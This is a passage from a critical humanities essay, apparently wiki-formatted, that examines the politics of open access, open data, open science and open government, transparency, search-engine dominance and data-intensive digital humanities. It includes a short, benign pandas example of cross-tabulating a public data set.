[http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and it encourages readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). 
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well-known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]n the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’ or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government passed the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States, Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). 
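&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The practical face of such campaigns is mundane but worth making explicit: once a data set is published openly, anyone with commodity software can cross-tabulate, rank and visualize it in precisely the ways the Guardian envisages. A minimal sketch (in Python with the pandas library; the file name and column names are hypothetical, since each government release has its own schema): &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of citizen analysis of an openly published data set.
# The file name and column names are hypothetical.
import pandas as pd

df = pd.read_csv("road_accidents_2009.csv")

# Cross-tabulate accident counts by region and severity.
table = pd.crosstab(df["region"], df["severity"])
print(table)

# Rank regions by total recorded accidents.
print(table.sum(axis=1).sort_values(ascending=False))
&amp;lt;/pre&amp;gt; &lt;br /&gt;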
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. 
In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. 
(Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
